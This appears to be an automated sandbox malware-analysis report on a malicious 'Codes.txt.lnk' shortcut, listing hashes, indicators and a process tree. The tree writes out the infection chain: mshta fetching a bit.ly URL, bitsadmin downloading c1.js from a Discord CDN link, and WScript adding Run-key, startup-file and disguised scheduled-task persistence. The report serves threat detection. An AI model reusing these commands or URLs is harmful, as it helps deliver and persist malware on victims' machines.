Analysis
max time kernel: 1789s
max time network: 1799s
platform: windows10_x64
resource: win10v20210410
submitted: 02-08-2021 20:16
Static task: static1
Behavioral task: behavioral1
  Sample: Codes.txt.lnk
  Resource: win7v20210408
Behavioral task: behavioral2
  Sample: Codes.txt.lnk
  Resource: win10v20210410
General
Target: Codes.txt.lnk
Size: 1KB
MD5: 537399896538f5897c325a350603a567
SHA1: 0a2ff41a38f91f79dde2a579138396bc5e5a7378
SHA256: 91b660e99b14d4d790953f9db3ba34d046d494624b53f53ef646fab40c64ace2
SHA512: fb61b629d1ba6c38164bf21a637a28dc741fe29df47ae81af0e448273b30a60504085f94ee3d31e981ca9d23ba7517a13ac4a8a4e805a13999d67bd29daec030
Malware Config
Extracted: https://bit.ly/3j6OXnh
Signatures

Blocklisted process makes network request (5 IoCs)
Processes: mshta.exe, WScript.exe
flow  pid   process
8     1656  mshta.exe
10    1656  mshta.exe
12    1656  mshta.exe
14    1656  mshta.exe
22    2336  WScript.exe

Drops startup file (1 IoC)
Processes: WScript.exe
description   ioc                                                                                  process
File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1.js  WScript.exe

Adds Run key to start application (2 TTPs, 2 IoCs)
Processes: WScript.exe
description      ioc                                                                                                process
Key created      \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run  WScript.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\JJM3W6LMN3 = "\"C:\\Users\\Admin\\AppData\\Roaming\\c1.js\""  WScript.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.

Download via BitsAdmin (1 TTP, 1 IoC)

Modifies registry class (1 IoC)
Processes: mshta.exe
description  ioc                                                                                   process
Key created  \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings  mshta.exe

Suspicious use of WriteProcessMemory (8 IoCs)
Processes: cmd.exe, mshta.exe, WScript.exe
description                       pid   process      target process
PID 3560 wrote to memory of 1656  3560  cmd.exe      mshta.exe
PID 3560 wrote to memory of 1656  3560  cmd.exe      mshta.exe
PID 1656 wrote to memory of 3996  1656  mshta.exe    bitsadmin.exe
PID 1656 wrote to memory of 3996  1656  mshta.exe    bitsadmin.exe
PID 1656 wrote to memory of 2336  1656  mshta.exe    WScript.exe
PID 1656 wrote to memory of 2336  1656  mshta.exe    WScript.exe
PID 2336 wrote to memory of 212   2336  WScript.exe  schtasks.exe
PID 2336 wrote to memory of 212   2336  WScript.exe  schtasks.exe
Processes (process tree; indentation shows parent/child depth)

C:\Windows\system32\cmd.exe
  cmd /c C:\Users\Admin\AppData\Local\Temp\Codes.txt.lnk
  - Suspicious use of WriteProcessMemory

  C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" "https://bit.ly/3j6OXnh"
    - Blocklisted process makes network request
    - Modifies registry class
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\bitsadmin.exe
      "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://cdn.discordapp.com/attachments/870779144429006911/870824147524157480/c1.js C:\Users\Admin\AppData\Local\Temp\c1.js
      - Download via BitsAdmin

    C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1.js"
      - Blocklisted process makes network request
      - Drops startup file
      - Adds Run key to start application
      - Suspicious use of WriteProcessMemory

      C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 30 /tn Skype /tr "C:\Users\Admin\AppData\Roaming\c1.js
        - Creates scheduled task(s)